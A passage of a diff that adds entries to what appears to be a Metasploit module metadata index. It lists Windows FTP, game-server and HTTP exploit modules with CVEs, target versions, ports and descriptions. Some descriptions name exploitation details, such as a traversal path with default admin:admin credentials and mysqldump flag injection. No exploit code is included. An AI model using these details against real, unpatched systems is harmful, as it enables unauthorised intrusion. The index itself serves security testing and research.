"windows/ftp/trellian_client_pasv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/turboftp_port": { + "name": "Turbo FTP Server 1.30.823 PORT Overflow", + "fullname": "exploit/windows/ftp/turboftp_port", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-10-03", + "type": "exploit", + "author": [ + "Zhao Liang", + "Lincoln", + 
"corelanc0d3r", + "thelightcosine" + ], + "description": "This module exploits a buffer overflow vulnerability found in the PORT\n command in Turbo FTP Server 1.30.823 & 1.30.826, which results in remote\n code execution under the context of SYSTEM.", + "references": [ + "EDB-22161", + "OSVDB-85887" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows Universal TurboFtp 1.30.823", + "Windows Universal TurboFtp 1.30.826" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/turboftp_port.rb", + "is_install_path": true, + "ref_name": "windows/ftp/turboftp_port", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/vermillion_ftpd_port": { + "name": "Vermillion FTP Daemon PORT Command Memory Corruption", + "fullname": "exploit/windows/ftp/vermillion_ftpd_port", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-09-23", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits an out-of-bounds array access in the Arcane Software\n Vermillion FTP server. By sending a specially crafted FTP PORT command,\n an attacker can corrupt stack memory and execute arbitrary code.\n\n This particular issue is caused by processing data bound by attacker\n controlled input while writing into a 4 byte stack buffer. Unfortunately,\n the writing that occurs is not a simple byte copy.\n\n Processing is done using a source ptr (p) and a destination pointer (q).\n The vulnerable function walks the input string and continues while the\n source byte is non-null. If a comma is encountered, the function increments\n the destination pointer. 
If an ascii digit [0-9] is encountered, the\n following occurs:\n\n *q = (*q * 10) + (*p - '0');\n\n All other input characters are ignored in this loop.\n\n As a consequence, an attacker must craft input such that modifications\n to the current values on the stack result in usable values. In this exploit,\n the low two bytes of the return address are adjusted to point at the\n location of a 'call edi' instruction within the binary. This was chosen\n since 'edi' points at the source buffer when the function returns.\n\n NOTE: This server can be installed as a service using \"vftpd.exe install\".\n If so, the service does not restart automatically, giving an attacker only\n one attempt.", + "references": [ + "OSVDB-62163", + "EDB-11293" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic Targeting", + "vftpd 1.31 - Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/vermillion_ftpd_port.rb", + "is_install_path": true, + "ref_name": "windows/ftp/vermillion_ftpd_port", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/warftpd_165_pass": { + "name": "War-FTPD 1.65 Password Overflow", + "fullname": "exploit/windows/ftp/warftpd_165_pass", + "aliases": [], + "rank": 200, + "disclosure_date": "1998-03-19", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This exploits the buffer overflow found in the PASS command\n in War-FTPD 1.65. This particular module will only work\n reliably against Windows 2000 targets. The server must be\n configured to allow anonymous logins for this exploit to\n succeed. 
A failed attempt will bring down the service\n completely.", + "references": [ + "CVE-1999-0256", + "OSVDB-875", + "BID-10078" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/warftpd_165_pass.rb", + "is_install_path": true, + "ref_name": "windows/ftp/warftpd_165_pass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/warftpd_165_user": { + "name": "War-FTPD 1.65 Username Overflow", + "fullname": "exploit/windows/ftp/warftpd_165_user", + "aliases": [], + "rank": 200, + "disclosure_date": "1998-03-19", + "type": "exploit", + "author": [ + "Fairuzan Roslan " + ], + "description": "This module exploits a buffer overflow found in the USER command\n of War-FTPD 1.65.", + "references": [ + "CVE-1999-0256", + "OSVDB-875", + "BID-10078" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Automatic", + "Windows 2000 SP0-SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows XP SP3 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/warftpd_165_user.rb", + "is_install_path": true, + "ref_name": "windows/ftp/warftpd_165_user", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wftpd_size": { + "name": "Texas Imperial Software WFTPD 3.23 SIZE Overflow", + "fullname": "exploit/windows/ftp/wftpd_size", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-08-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer 
overflow in the SIZE verb in\n Texas Imperial's Software WFTPD 3.23.", + "references": [ + "CVE-2006-4318", + "OSVDB-28134", + "BID-19617" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP1 English", + "Windows XP Pro SP2 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/wftpd_size.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wftpd_size", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/winaxe_server_ready": { + "name": "WinaXe 7.7 FTP Client Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/winaxe_server_ready", + "aliases": [], + "rank": 400, + "disclosure_date": "2016-11-03", + "type": "exploit", + "author": [ + "Chris Higgins", + "hyp3rlix" + ], + "description": "This module exploits a buffer overflow in the WinaXe 7.7 FTP client.\n This issue is triggered when a client connects to the server and is\n expecting the Server Ready response.", + "references": [ + "EDB-40693", + "URL-http://hyp3rlinx.altervista.org/advisories/WINAXE-FTP-CLIENT-REMOTE-BUFFER-OVERFLOW.txt" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/winaxe_server_ready.rb", + "is_install_path": true, + "ref_name": "windows/ftp/winaxe_server_ready", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wing_ftp_admin_exec": { + "name": "Wing FTP Server Authenticated Command Execution", + "fullname": "exploit/windows/ftp/wing_ftp_admin_exec", + "aliases": [], 
+ "rank": 600, + "disclosure_date": "2014-06-19", + "type": "exploit", + "author": [ + "Nicholas Nam ", + "Imran E. Dawoodjee " + ], + "description": "This module exploits the embedded Lua interpreter in the admin web interface for\n versions 3.0.0 and above. When supplying a specially crafted HTTP POST request\n an attacker can use os.execute() to execute arbitrary system commands on\n the target with SYSTEM privileges.", + "references": [ + "URL-http://www.wftpserver.com", + "URL-https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm" + ], + "platform": "Windows", + "arch": "x86", + "rport": 5466, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Wing FTP Server >= 3.0.0" + ], + "mod_time": "2021-02-17 12:33:59 +0000", + "path": "/modules/exploits/windows/ftp/wing_ftp_admin_exec.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wing_ftp_admin_exec", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wsftp_server_503_mkd": { + "name": "WS-FTP Server 5.03 MKD Overflow", + "fullname": "exploit/windows/ftp/wsftp_server_503_mkd", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-11-29", + "type": "exploit", + "author": [ + "et ", + "Reed Arvin " + ], + "description": "This module exploits the buffer overflow found in the MKD\n command in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n Arvin.", + "references": [ + "CVE-2004-1135", + "OSVDB-12509", + "BID-11772" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "WS-FTP Server 5.03 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb", + "is_install_path": true, + "ref_name": 
"windows/ftp/wsftp_server_503_mkd", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/wsftp_server_505_xmd5": { + "name": "Ipswitch WS_FTP Server 5.05 XMD5 Overflow", + "fullname": "exploit/windows/ftp/wsftp_server_505_xmd5", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-09-14", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a buffer overflow in the XMD5 verb in\n IPSWITCH WS_FTP Server 5.05.", + "references": [ + "CVE-2006-4847", + "OSVDB-28939", + "BID-20076" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + "Windows 2000 Pro SP4 English", + "Windows XP Pro SP0 English", + "Windows XP Pro SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb", + "is_install_path": true, + "ref_name": "windows/ftp/wsftp_server_505_xmd5", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/xftp_client_pwd": { + "name": "Xftp FTP Client 3.0 PWD Remote Buffer Overflow", + "fullname": "exploit/windows/ftp/xftp_client_pwd", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-04-22", + "type": "exploit", + "author": [ + "zombiefx", + "dookie" + ], + "description": "This module exploits a buffer overflow in the Xftp 3.0 FTP client that is triggered\n through an excessively long PWD message.", + "references": [ + "OSVDB-63968", + "EDB-12332" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/xftp_client_pwd.rb", + "is_install_path": true, + 
"ref_name": "windows/ftp/xftp_client_pwd", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/xlink_client": { + "name": "Xlink FTP Client Buffer Overflow", + "fullname": "exploit/windows/ftp/xlink_client", + "aliases": [], + "rank": 300, + "disclosure_date": "2009-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Xlink FTP Client 32\n Version 3.01 that comes bundled with Omni-NFS Enterprise 5.2.\n When an overly long FTP server response is received by a client,\n arbitrary code may be executed.", + "references": [ + "CVE-2006-5792", + "OSVDB-33969", + "URL-http://www.xlink.com" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Pro SP3 English", + "Windows 2000 SP4 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/xlink_client.rb", + "is_install_path": true, + "ref_name": "windows/ftp/xlink_client", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/ftp/xlink_server": { + "name": "Xlink FTP Server Buffer Overflow", + "fullname": "exploit/windows/ftp/xlink_server", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-10-03", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Xlink FTP Server\n that comes bundled with Omni-NFS Enterprise 5.2.\n When a overly long FTP request is sent to the server,\n arbitrary code may be executed.", + "references": [ + "CVE-2006-5792", + "OSVDB-58646", + "URL-http://www.xlink.com" + ], + "platform": "Windows", + "arch": "", + "rport": 21, + "autofilter_ports": [ + 21, + 2121 + ], + "autofilter_services": [ + "ftp" + ], + "targets": [ + 
"Omni-NFS Enterprise V5.2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/ftp/xlink_server.rb", + "is_install_path": true, + "ref_name": "windows/ftp/xlink_server", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/games/mohaa_getinfo": { + "name": "Medal of Honor Allied Assault getinfo Stack Buffer Overflow", + "fullname": "exploit/windows/games/mohaa_getinfo", + "aliases": [], + "rank": 500, + "disclosure_date": "2004-07-17", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits a stack based buffer overflow in the getinfo\n command of Medal Of Honor Allied Assault.", + "references": [ + "CVE-2004-0735", + "OSVDB-8061", + "EDB-357", + "BID-10743" + ], + "platform": "Windows", + "arch": "", + "rport": 12203, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Medal Of Honor Allied Assault v 1.0 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/games/mohaa_getinfo.rb", + "is_install_path": true, + "ref_name": "windows/games/mohaa_getinfo", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/games/racer_503beta5": { + "name": "Racer v0.5.3 Beta 5 Buffer Overflow", + "fullname": "exploit/windows/games/racer_503beta5", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-08-10", + "type": "exploit", + "author": [ + "Trancek " + ], + "description": "This module exploits the Racer Car and Racing Simulator game\n versions v0.5.3 beta 5 and earlier. Both the client and server listen\n on UDP port 26000. 
By sending an overly long buffer we are able to\n execute arbitrary code remotely.", + "references": [ + "CVE-2007-4370", + "OSVDB-39601", + "EDB-4283", + "BID-25297" + ], + "platform": "Windows", + "arch": "", + "rport": 26000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Fmodex.dll - Universal", + "Win XP SP2 English", + "Win XP SP2 Spanish" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/games/racer_503beta5.rb", + "is_install_path": true, + "ref_name": "windows/games/racer_503beta5", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/games/ut2004_secure": { + "name": "Unreal Tournament 2004 \"secure\" Overflow (Win32)", + "fullname": "exploit/windows/games/ut2004_secure", + "aliases": [], + "rank": 400, + "disclosure_date": "2004-06-18", + "type": "exploit", + "author": [ + "stinko " + ], + "description": "This is an exploit for the GameSpy secure query in\n the Unreal Engine.\n\n This exploit only requires one UDP packet, which can\n be both spoofed and sent to a broadcast address.\n Usually, the GameSpy query server listens on port 7787,\n but you can manually specify the port as well.\n\n The RunServer.sh script will automatically restart the\n server upon a crash, giving us the ability to\n bruteforce the service and exploit it multiple\n times.", + "references": [ + "CVE-2004-0608", + "OSVDB-7217", + "BID-10570" + ], + "platform": "Windows", + "arch": "", + "rport": 7787, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "UT2004 Build 3186" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/games/ut2004_secure.rb", + "is_install_path": true, + "ref_name": "windows/games/ut2004_secure", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + 
"exploit_windows/http/adobe_robohelper_authbypass": { + "name": "Adobe RoboHelp Server 8 Arbitrary File Upload and Execute", + "fullname": "exploit/windows/http/adobe_robohelper_authbypass", + "aliases": [], + "rank": 600, + "disclosure_date": "2009-09-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits an authentication bypass vulnerability which\n allows remote attackers to upload and execute arbitrary code.", + "references": [ + "CVE-2009-3068", + "OSVDB-57896", + "URL-http://www.intevydis.com/blog/?p=69", + "ZDI-09-066" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/adobe_robohelper_authbypass.rb", + "is_install_path": true, + "ref_name": "windows/http/adobe_robohelper_authbypass", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/advantech_iview_networkservlet_cmd_inject": { + "name": "Advantech iView NetworkServlet Command Injection", + "fullname": "exploit/windows/http/advantech_iview_networkservlet_cmd_inject", + "aliases": [], + "rank": 600, + "disclosure_date": "2022-06-28", + "type": "exploit", + "author": [ + "rgod", + "y4er", + "Shelby Pace" + ], + "description": "Versions of Advantech iView software below `5.7.04.6469` are\n vulnerable to an unauthenticated command injection vulnerability\n via the `NetworkServlet` endpoint.\n The database backup functionality passes a user-controlled parameter,\n `backup_file` to the `mysqldump` command. 
The sanitization functionality only\n tests for SQL injection attempts and directory traversal, so leveraging the\n `-r` and `-w` `mysqldump` flags permits exploitation.\n The command injection vulnerability is used to write a payload on the target\n and achieve remote code execution as NT AUTHORITY\\SYSTEM.", + "references": [ + "URL-https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/", + "CVE-2022-2143" + ], + "platform": "Windows", + "arch": "x86, x64, cmd", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Dropper", + "Windows Command" + ], + "mod_time": "2022-08-09 16:12:54 +0000", + "path": "/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb", + "is_install_path": true, + "ref_name": "windows/http/advantech_iview_networkservlet_cmd_inject", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/advantech_iview_unauth_rce": { + "name": "Advantech iView Unauthenticated Remote Code Execution", + "fullname": "exploit/windows/http/advantech_iview_unauth_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-02-09", + "type": "exploit", + "author": [ + "wvu ", + "Spencer McIntyre" + ], + "description": "This module exploits an unauthenticated configuration change combined\n with an unauthenticated file write primitive, leading to an arbitrary\n file write that allows for remote code execution as the user running\n iView, which is typically NT AUTHORITY\\SYSTEM.\n\n This issue was demonstrated in the vulnerable version 5.7.02.5992 and\n fixed in version 5.7.03.6112.", + "references": [ + "CVE-2021-22652", 
+ "URL-https://www.rapid7.com/blog/post/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/", + "URL-https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2022-01-23 15:28:32 +0000", + "path": "/modules/exploits/windows/http/advantech_iview_unauth_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/advantech_iview_unauth_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "config-changes", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/ajaxpro_deserialization_rce": { + "name": "AjaxPro Deserialization Remote Code Execution", + "fullname": "exploit/windows/http/ajaxpro_deserialization_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-12-03", + "type": "exploit", + "author": [ + "Hans-Martin Münch (MOGWAI LABS)", + "Jemmy Wang" + ], + "description": "This module leverages an insecure deserialization of data to get\n remote code execution on the target OS in the context of the user\n running the website which utilized AjaxPro.\n\n To achieve code execution, the module will construct some JSON data\n which will be sent to the target. 
This data will be deserialized by\n the AjaxPro JsonDeserializer and will trigger the execution of the\n payload.\n\n All AjaxPro versions prior to 21.10.30.1 are vulnerable to this\n issue, and a vulnerable method which can be used to trigger the\n deserialization exists in the default AjaxPro namespace.\n\n AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom\n method that accepts a parameter of type that is assignable from\n `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can\n still be exploited.\n\n This module has been tested successfully against official AjaxPro on\n version 7.7.31.1 without any modification, and on version 21.10.30.1\n with a custom vulnerable method added.", + "references": [ + "CVE-2021-23758", + "URL-https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper" + ], + "mod_time": "2023-11-03 00:04:20 +0000", + "path": "/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/ajaxpro_deserialization_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "screen-effects", + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/altn_securitygateway": { + "name": "Alt-N SecurityGateway username Buffer Overflow", + "fullname": "exploit/windows/http/altn_securitygateway", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-06-02", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "Alt-N SecurityGateway is prone to a buffer 
overflow condition. This\n is due to insufficient bounds checking on the \"username\"\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n\n NOTE: This service doesn't restart, you'll only get one shot. However,\n it often survives a successful exploitation attempt.", + "references": [ + "CVE-2008-4193", + "OSVDB-45854", + "BID-29457" + ], + "platform": "Windows", + "arch": "", + "rport": 4000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Targeting", + "SecurityGateway 1.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/altn_securitygateway.rb", + "is_install_path": true, + "ref_name": "windows/http/altn_securitygateway", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/altn_webadmin": { + "name": "Alt-N WebAdmin USER Buffer Overflow", + "fullname": "exploit/windows/http/altn_webadmin", + "aliases": [], + "rank": 200, + "disclosure_date": "2003-06-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. 
Successful exploitation could result in code\n execution with SYSTEM level privileges.", + "references": [ + "CVE-2003-0471", + "OSVDB-2207", + "BID-8024", + "URL-http://www.nessus.org/plugins/index.php?view=single&id=11771" + ], + "platform": "Windows", + "arch": "", + "rport": 1000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "WebAdmin 2.0.4 Universal", + "WebAdmin 2.0.3 Universal", + "WebAdmin 2.0.2 Universal", + "WebAdmin 2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/altn_webadmin.rb", + "is_install_path": true, + "ref_name": "windows/http/altn_webadmin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/amlibweb_webquerydll_app": { + "name": "Amlibweb NetOpacs webquery.dll Stack Buffer Overflow", + "fullname": "exploit/windows/http/amlibweb_webquerydll_app", + "aliases": [], + "rank": 300, + "disclosure_date": "2010-08-03", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. 
By specifying\n an overly long string to the 'app' parameter, SeH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.", + "references": [ + "OSVDB-66814", + "BID-42293", + "URL-http://www.aushack.com/advisories/" + ], + "platform": "Windows", + "arch": "x86", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro All - English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb", + "is_install_path": true, + "ref_name": "windows/http/amlibweb_webquerydll_app", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_activemq_traversal_upload": { + "name": "Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload", + "fullname": "exploit/windows/http/apache_activemq_traversal_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-08-19", + "type": "exploit", + "author": [ + "David Jorm", + "Erik Wynter" + ], + "description": "This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache\n ActiveMQ 5.x before 5.11.2 for Windows.\n\n The module tries to upload a JSP payload to the /admin directory via the traversal\n path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ\n credentials admin:admin (or other credentials provided by the user). 
It then issues\n an HTTP GET request to /admin/.jsp on the target in order to trigger the\n payload and obtain a shell.", + "references": [ + "CVE-2015-1830", + "EDB-40857", + "URL-https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 8161, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Java" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/http/apache_activemq_traversal_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_activemq_traversal_upload", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_chunked": { + "name": "Apache Win32 Chunked Encoding", + "fullname": "exploit/windows/http/apache_chunked", + "aliases": [], + "rank": 400, + "disclosure_date": "2002-06-19", + "type": "exploit", + "author": [ + "hdm ", + "jduck " + ], + "description": "This module exploits the chunked transfer integer wrap\n vulnerability in Apache version 1.2.x to 1.3.24. This\n particular module has been tested with all versions of the\n official Win32 build between 1.3.9 and 1.3.24. Additionally,\n it should work against most co-branded and bundled versions\n of Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n You will need to use the Check() functionality to determine\n the exact target version prior to launching the exploit. 
The\n version of Apache bundled with Oracle 8.1.7 will not\n automatically restart, so if you use the wrong target value,\n the server will crash.", + "references": [ + "CVE-2002-0392", + "OSVDB-838", + "BID-5033" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Generic Bruteforce", + "Apache.org Build 1.3.9->1.3.19", + "Apache.org Build 1.3.22->1.3.24", + "Apache.org Build 1.3.19->1.3.24", + "Apache.org Build 1.3.22", + "Apache.org Build 1.3.17->1.3.24 (Windows 2000)", + "Apache.org Build 1.3.17->1.3.24 (Windows NT)", + "Windows 2003 English SP0", + "Windows 2000 English", + "Oracle 8.1.7 Apache 1.3.12", + "Oracle 9.1.0 Apache 1.3.12", + "Oracle 9.2.0 Apache 1.3.22", + "Debugging Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/apache_chunked.rb", + "is_install_path": true, + "ref_name": "windows/http/apache_chunked", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/apache_mod_rewrite_ldap": { + "name": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow", + "fullname": "exploit/windows/http/apache_mod_rewrite_ldap", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-07-28", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits 